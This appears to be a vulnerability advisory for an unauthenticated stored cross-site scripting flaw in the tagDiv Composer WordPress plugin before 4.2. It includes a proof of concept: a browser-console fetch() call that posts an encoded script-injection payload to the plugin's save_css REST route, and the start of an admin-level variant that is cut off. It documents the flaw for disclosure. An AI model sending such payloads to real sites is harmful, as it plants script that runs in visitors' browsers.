tagDiv Composer < 4.2 - Unauthenticated Stored XSS

Description The plugin, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not have authorisation in a REST route and does not validate as well as escape some parameters when outputting them back, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks. Note: The issue was partially fixed in 4.1 (still exploitable by Admin+ as only authorisation was added) and fully fixed in 4.2

PoC

Before 4.1: 1. Visit Newsmag > Plugins and install and activate “tagDiv Composer” 2. Run the following code in the browser console while logged out: fetch( ‘/wp-json/tdw/save_css’, { headers: { “Content-Type”: “application/x-www-form-urlencoded”, }, body: “compiled_css=%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%28%27XSS%2DChecker%27%29%3E%3Cstyle%3E”, method: “POST”, } ); In version 4.1, exploitable by Admin: 1. Visit Newsmag > Plugins and install and activate “tagDiv Composer” 2. Log in as an admin, and run the following code in a browser console within WP Admin: await wp.apiRequest( { path: ‘tdw/save_css’, type: ‘POST’, data: { compiled_css: "